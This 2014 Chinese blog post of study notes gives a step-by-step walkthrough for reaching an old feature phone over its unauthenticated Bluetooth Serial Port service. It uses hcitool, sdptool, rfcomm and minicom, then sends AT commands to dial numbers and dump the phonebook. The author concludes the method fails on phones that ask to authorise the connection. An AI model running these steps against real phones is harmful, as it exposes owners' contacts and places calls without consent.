[Kali_BT]通过低版本SerialPort蓝牙渗透功能手机

蓝牙安全1:通过低版本蓝牙渗透手机 - xiao106347 - 学习笔记 
方法并非原创,均来自互联网,这里只是记录下笔者自己的操作过程,大神无视之~
 
平台:kali_linux             #因为kali自带很对安全审计工具,无需单独一个一个安装
目标:某品牌功能手机            #蓝牙版本较低,有可利用的漏洞
 
 
准备: 因为攻击平台已经集成很多安全审计工具,这里只需要安装一个软件:minicom
apt-get install minicom
 
ok,开始工作!
1.查看自己主机的蓝牙设备
hciconfig                                #可以看到本机蓝牙设备为hci0
2.加载蓝牙设备
hciconfig hcix up                        #加载本机蓝牙设备hci0
3.搜索周围的蓝牙设备
hcitool -i hcix scan                       #搜索到一功能手机开了蓝牙功能(Fuck Me!)
4.浏览目标设备所有可用服务
sdptool browse mac                    #扫描目标蓝牙的mac
 
蓝牙安全1:通过低版本蓝牙渗透手机 - xiao106347 - 学习笔记
  
5.查看到目标蓝牙有“Serial Port0”,这正是这里所要利用的漏洞,这里频道为11;打开/etc/bluetooth/rfcomm.conf,去掉下面段的注释符,并修改device和channel与目标主机相同;保存退出!
蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记
 
6.与目标蓝牙设备建立映射:
rfcomm bind /dev/rfcomm0
 
7.配置minicom:
 输入minicom -m -s进入setup模式;
选择Serial port setup:
蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记
 
设置Serial Device 为/dev/rfcomm0                       #这里与前面的映射设备相同
蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记
 
Save setup as dfl              #回车保存
Exit from Minicom               #退出
蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记
 
8.开始控制目标手机:
输入minicom -m             #开始控制目标手机,此时目标手机会出现一个“串口已连接”的窗口一闪而过!
蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记
 
在该窗口输入atdt xxxxx(电话号码)                              #拨打电话
输入at+cpbr=1,80                            #显示目标手机电话簿,这里1为从第一个开始显示,80为到第80个结束显示
蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记

更多功能按alt+z键! 
蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记
 
 
总结:
通常好的手机段都有认证机制,故链接串口会弹出允许连接框,所以很难做到,无后台链接,不推荐使用以上方法。
posted @ 2014-10-29 19:01  It's_Lee  阅读(1197)  评论(0编辑  收藏  举报